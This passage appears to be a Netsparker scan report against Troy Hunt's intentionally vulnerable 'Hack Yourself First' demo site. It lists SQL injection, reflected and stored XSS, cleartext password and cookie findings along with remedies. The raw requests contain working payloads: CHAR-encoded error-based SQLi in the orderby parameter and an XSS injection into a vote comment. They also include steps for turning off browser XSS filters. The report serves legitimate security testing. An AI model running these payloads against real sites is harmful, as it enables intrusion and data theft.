Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_2dilemma&#39; to data type int.   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)   at System.Data.SqlClient.SqlInternalConnecti…
2.4 /Make/3 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters:
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_2dilemma&#39; to data type int.   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)   at System.Data.SqlClient.SqlInternalConnecti…
2.5 /Make/1 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters:
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request:
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_2dilemma&#39; to data type int.   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)   at System.Data.SqlClient.SqlInternalConnecti…
IMPORTANT
TOTAL: 1
CONFIRMED: 1
3. Cross-site Scripting
Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Impact: There are many different attacks that can be leveraged through the use of cross-site scripting, including:
Hijacking user's active session
Mounting phishing attacks
Intercepting data and performing man-in-the-middle attacks
Remedy: The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.
Remedy References: Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet; OWASP AntiSamy Java
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling
Proof of Concept Notes: Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used other than for testing purposes. Even though browsers have certain checks to prevent Cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism, therefore a web application should not rely on this kind of client-side browser checks.
Chrome
Open command prompt. Go to the folder where chrome.exe is located. Run the command: chrome.exe --args --disable-xss-auditor
Internet Explorer
Click Tools -> Internet Options and then navigate to the Security Tab. Click Custom level and scroll towards the bottom, where you will find that Enable XSS filter is currently Enabled. Set it to disabled. Click OK. Click Yes to accept the warning, followed by Apply.
Firefox
Go to about:config in the URL address bar. In the search field type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double clicking the row.
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI v2.0-6.5.7, PCI v3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Response:
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">+netsparker(9)+</span>&quot;</h2>
<p class="alert alert-error">No results found for your search.</p>
</section><hr /><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$('#results tr').click(function () { var url = '/Supercar/' + $(this).attr('id'); window.location.href = url; });
$('#searchTerm').val('+netsparker(9)+');</script>
<script>(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
IMPORTANT: 1 total, 1 confirmed

4. Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted as HTML, JavaScript or VBScript by the browser.

Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.
Impact: Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- Users' session-sensitive information, such as cookies, can be stolen.
- XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
- The website can be redirected to a new location, defaced or used as a phishing site.
Remedy: The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet; OWASP AntiSamy Java
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
4.1 /Supercar/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/3
Injection URL: http://hackyourselffirst.troyhunt.com/api/vote
Injection Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3E%3Cnet+sparker%3Dnetsparker(0x00043F)%3E
Identification Request:
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Injection Response:
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response:
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
IMPORTANT: 1 total, 1 confirmed

5. Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.
Impact: If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take:
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Register
Form target action: http://hackyourselffirst.troyhunt.com/Account/Register
Request:
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: 
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
IMPORTANT: 1 total, 1 confirmed

6. Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure and transmitted over HTTPS.
This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.

Impact: This cookie will be transmitted over an HTTP connection; therefore, if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
Actions to Take:
1. See the remedy for solution.
2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)

Remedy: Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation: To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.
External References: .NET Cookie.Secure Property; How to Create Totally Secure Cookies
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15

6.1 /Account/Login CONFIRMED
https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie: AuthCookie
Request:
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response:
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
IMPORTANT: 1 total

7. Out-of-date Version (Microsoft SQL Server)
Netsparker identified that you are using an out-of-date version of Microsoft SQL Server.
Impact: Since this is an old version of the software, it may be vulnerable to attacks.

Remedy: Please upgrade your installation of Microsoft SQL Server to the latest stable version.

Classification: OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310

7.1 /Make/1
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Identified Version: 11.0.9222.17
Latest Version: 12.00.2000
Vulnerability Database: Result is based on 18/08/2014 vulnerability database content.
Certainty
Request:
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
@media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } }
@media screen and (max-width: 479px) { pre { width: 280px; } }
</style></head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
MEDIUM: 1 total, 1 confirmed

8. Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.
Impact: If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or by changing the action of the HTML form to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.

This issue is important as it negates the use of SSL as a privacy protection barrier.
Actions to Take:
1. See the remedy for solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04

8.1 /Account/Login CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Login
